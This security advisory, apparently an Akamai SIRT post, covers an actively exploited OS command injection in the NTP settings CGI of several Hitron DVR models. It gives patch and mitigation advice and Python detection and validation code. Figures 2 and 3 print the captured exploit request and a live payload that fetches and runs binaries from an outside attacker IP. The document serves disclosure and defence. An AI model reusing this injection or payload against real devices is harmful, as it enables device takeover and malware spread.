
Actively Exploited Vulnerability in Hitron DVRs: Fixed, Patches Available


Written by

Aline Eliovich, Kyle Lefton, Chad Seaman, and Larry Cashdollar

January 30, 2024

Aline Eliovich

Aline Eliovich, with six years of experience in the security field, currently works as a Researcher on Akamai's Security Intelligence Response Team. She studied computer science at the Holon Technology Institute. Aline enjoys using different Open Source Intelligence (OSINT) methods for her research.

Kyle Lefton

Kyle Lefton is a security researcher on Akamai's Security Intelligence Response Team. Formerly an intelligence analyst for the Department of Defense, Kyle has experience in cyber defense, threat research, and counter-intelligence, spanning several years. He takes pride in investigating emerging threats, vulnerability research, and threat group mapping. In his free time, he enjoys spending time with friends and family, strategy games, and hiking in the great outdoors.

Chad Seaman

Chad Seaman is a Principal Security Researcher and Team Lead of Akamai’s Security Intelligence Response Team. He proudly refers to himself as an “Internet Dumpster Diver,” and enjoys looking through the muck and mire he finds there. Chad began his career as a programmer, and after being exposed to security, exploitation, and forensics via breach investigations, security quickly became his preferred work. He now spends his time engulfed in malware investigations, reverse engineering, vulnerability research, DDoS, and cybercrime investigations. He likes flying airplanes, poking holes in paper at a distance, and spending time in nature, preferably in the woods, on a trail, or on a dirt bike.

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

As part of the InfectedSlurs discovery, the Akamai SIRT uncovered vulnerabilities in multiple Hitron DVR device models that are actively exploited in the wild.

Executive summary

Need to know

As part of the InfectedSlurs discovery, the Akamai SIRT uncovered vulnerabilities in multiple Hitron DVR device models that are actively exploited in the wild. Hitron devices are manufactured in South Korea by Hitron Systems.

The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the device's management interface. The exploitation attempts captured by our honeypots authenticate with the devices' default credentials, so a DVR that still uses factory credentials can be compromised by anyone who can reach its management port.

The impacted devices and firmware versions are:

  • DVR HVR-4781: versions 1.03 through 4.02

  • DVR HVR-8781: versions 1.03 through 4.02

  • DVR HVR-16781: versions 1.03 through 4.02

  • DVR LGUVR-4H: versions 1.02 through 4.02

  • DVR LGUVR-8H: versions 1.02 through 4.02

  • DVR LGUVR-16H: versions 1.02 through 4.02

The vendor (Hitron Systems) has released new firmware versions to address the vulnerabilities and recommends upgrading all impacted models to firmware version ≥ 4.03 as soon as possible. Advisories have also been published by CISA and KISA. KISA has additionally released advisories for the individual CVEs, which can be found at the following links:

Exploitation observed

In late October 2023, Akamai SIRT analysts noticed a surge in activity to our honeypots that targeted a rarely abused TCP port. The probes were of low frequency and appeared to first attempt authentication via a POST request to /cgi-bin/system_ntp.cgi (Figure 1), followed by a command injection exploitation attempt (Figure 2). The targeted devices are Hitron Systems DVRs that are vulnerable to RCE via command injection. Once authenticated, the attacker targets the command injection vulnerability in the timeserver parameter via a POST request to /cgi-bin/system_ntp.cgi. The captured payload (Figure 3) is a form-encoded shell command line (each + is a space) that uses curl to fetch a binary for each of several CPU architectures (mips, x86, mpsl, arm, arm5, arm6, arm7), marks it executable with chmod 777, and runs it with the argument kdvr, so a single injection succeeds regardless of which SoC the DVR is built on.

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  enc=11&ip=[targeted IP]&username=[REDACTED]&password=[REDACTED]

Fig. 1: Authentication attempt

  URL: /cgi-bin/system_ntp.cgi

  POST BODY:
  lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver=[RCE PAYLOAD]&interval=60&enableNTPServer=1

Fig. 2: Exploitation attempt

  curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr

Fig. 3: Captured RCE payload
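The following Python is an added example, not Akamai code and not Hitron firmware. It pulls together what Figures 1 to 3 give a defender: how the captured body decodes once the form encoding is reversed (+ becomes a space, which is why the timeserver value reads as one shell command line), a detection rule for honeypot or reverse-proxy captures that flags POSTs to /cgi-bin/system_ntp.cgi whose timeserver value cannot be an NTP host and extracts the download URLs and hosts as indicators, and the strict allowlist that a fixed CGI would need to apply to timeserver before the value reaches a shell (an assumption about how such a fix would look; the vendor's actual patch is not described on this page). The request framing, Host header and 192.0.2.10 target are constructed for the example; the path, parameter names and payload are taken from the figures.

```python
"""Detection and validation for the Hitron DVR system_ntp.cgi command injection.

Added example (not Akamai's code, not Hitron firmware). Sample requests below
are constructed; only the CGI path, parameter names and the timeserver payload
come from the captured traffic shown in Figures 1 to 3.
"""
import re
from urllib.parse import unquote_plus, urlsplit

NTP_CGI = "/cgi-bin/system_ntp.cgi"

# The only shapes an NTP server setting legitimately takes: an RFC 1123
# hostname or a dotted-quad IPv4 literal. Anything else is rejected outright.
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)
# Characters that let a value escape a shell command line (reported as a reason).
_SHELL_META = re.compile(r"[;|&`$(){}<>\s]")
# Token handed to a downloader inside an injected command, and IPv4 literals.
_FETCH_RE = re.compile(r"\b(?:curl|wget)\s+(\S+)")
_IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def valid_ntp_server(value: str) -> bool:
    """Allowlist check a hardened CGI would apply before timeserver reaches a
    shell: accept a hostname or IPv4 literal and nothing else (assumed fix)."""
    return bool(_HOST_RE.match(value))


def form_decode(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body the way the CGI does
    ('+' becomes a space, %XX is unescaped). Split by hand so that ';' inside
    the injected value is never treated as a pair separator."""
    params = {}
    for pair in body.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def parse_request(raw: str):
    """Split a raw HTTP/1.x request into (method, path, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    parts = head.split("\r\n", 1)[0].split()
    if len(parts) < 2:
        return "", "", body
    return parts[0], urlsplit(parts[1]).path, body


def classify(raw: str) -> dict:
    """Verdict for one request: 'other', 'auth', 'benign_ntp' or 'exploit'.
    An 'exploit' verdict carries the decoded timeserver value plus the fetch
    URLs and IPv4 hosts found in it, ready to be used as indicators."""
    method, path, body = parse_request(raw)
    if method != "POST" or path != NTP_CGI:
        return {"verdict": "other"}
    params = form_decode(body)
    if "username" in params and "password" in params:
        return {"verdict": "auth"}  # Figure 1: credential submission precedes the injection
    if "timeserver" not in params:
        return {"verdict": "other"}
    timeserver = params["timeserver"]
    if valid_ntp_server(timeserver):
        return {"verdict": "benign_ntp", "timeserver": timeserver}
    return {
        "verdict": "exploit",
        "decoded_timeserver": timeserver,
        "shell_meta": bool(_SHELL_META.search(timeserver)),
        "download_urls": _FETCH_RE.findall(timeserver),
        "hosts": sorted(set(_IPV4_RE.findall(timeserver))),
    }


# Constructed captures. 192.0.2.10 is a documentation-range placeholder target.
_HEAD = ("POST /cgi-bin/system_ntp.cgi HTTP/1.1\r\nHost: 192.0.2.10\r\n"
         "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
AUTH_REQUEST = _HEAD + "enc=11&ip=192.0.2.10&username=REDACTED&password=REDACTED"
CAPTURED_PAYLOAD = (  # Figure 3, verbatim, still form-encoded
    "curl+http://45.142.182.96/spl/mips+-O;+chmod+777+mips;+./mips+kdvr;"
    "curl+http://45.142.182.96/spl/x86+-O;+chmod+777+x86;+./x86+kdvr;"
    "curl+http://45.142.182.96/spl/mpsl+-O;+chmod+777+mpsl;+./mpsl+kdvr;"
    "curl+http://45.142.182.96/spl/arm+-O;+chmod+777+arm;+./arm+kdvr;"
    "curl+http://45.142.182.96/spl/arm5+-O;+chmod+777+arm5;+./arm5+kdvr;"
    "curl+http://45.142.182.96/spl/arm6+-O;+chmod+777+arm6;+./arm6+kdvr;"
    "curl+http/45.142.182.96/spl/arm7+-O;+chmod+777+arm7;+./arm7+kdvr"
)
EXPLOIT_REQUEST = (_HEAD + "lang=ja&useNTPServer=1&synccheck=1&public=0&timeserver="
                   + CAPTURED_PAYLOAD + "&interval=60&enableNTPServer=1")
BENIGN_REQUEST = (_HEAD + "lang=en&useNTPServer=1&synccheck=1&public=0"
                  "&timeserver=pool.ntp.org&interval=60&enableNTPServer=1")

if __name__ == "__main__":
    for name, req in (("auth", AUTH_REQUEST), ("exploit", EXPLOIT_REQUEST),
                      ("benign", BENIGN_REQUEST)):
        print(name, classify(req))
```

The verdict for the exploit request lists seven fetch URLs (one per architecture, including the malformed http/ one at the end of the captured payload) and a single host, 45.142.182.96, which is exactly the set of indicators to block at the egress and to search for in DVR traffic. On the device side, the allowlist in valid_ntp_server is the point: the injected value fails it before any shell is involved, whereas a blocklist of metacharacters would have to be complete to be safe.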

Protection

Hitron DVR users who are running devices impacted by this vulnerability should immediately upgrade to the latest available firmware version (≥ 4.03), which fixes the RCE vulnerability.

Additionally, to protect against this and future threats, several security measures should be implemented. First, organizations and individuals using the affected devices should change the default login credentials immediately; the exploitation observed here depends on them. Regular monitoring of network traffic and logs (in this case, POST requests to /cgi-bin/system_ntp.cgi carrying a timeserver value that is not a hostname or IP address) can aid in the early detection of suspicious activity. Timely installation of security patches and updates from the device manufacturer is crucial to address the identified vulnerability.

Collaboration with security researchers, threat intelligence providers, and industry peers can help you stay informed about emerging threats and vulnerabilities. Finally, maintaining an updated inventory of connected devices and implementing network segmentation can limit the potential impact of such attacks.

Conclusion

Addressing the security issues identified in the Hitron systems and associated devices requires a multifaceted approach, combining user awareness, prompt patching, proactive monitoring, and collaboration within the cybersecurity community. By taking these measures, organizations and individuals can significantly reduce the risks posed by the observed malicious activity.

Stay tuned

To keep up with threats and other findings by the SIRT and other Akamai security research groups, follow us on X (formerly Twitter) or check out our SIG hub.

The Akamai SIRT would like to thank the folks at CISA, US-CERT, and KISA for their assistance in reporting these vulnerabilities to the vendors.
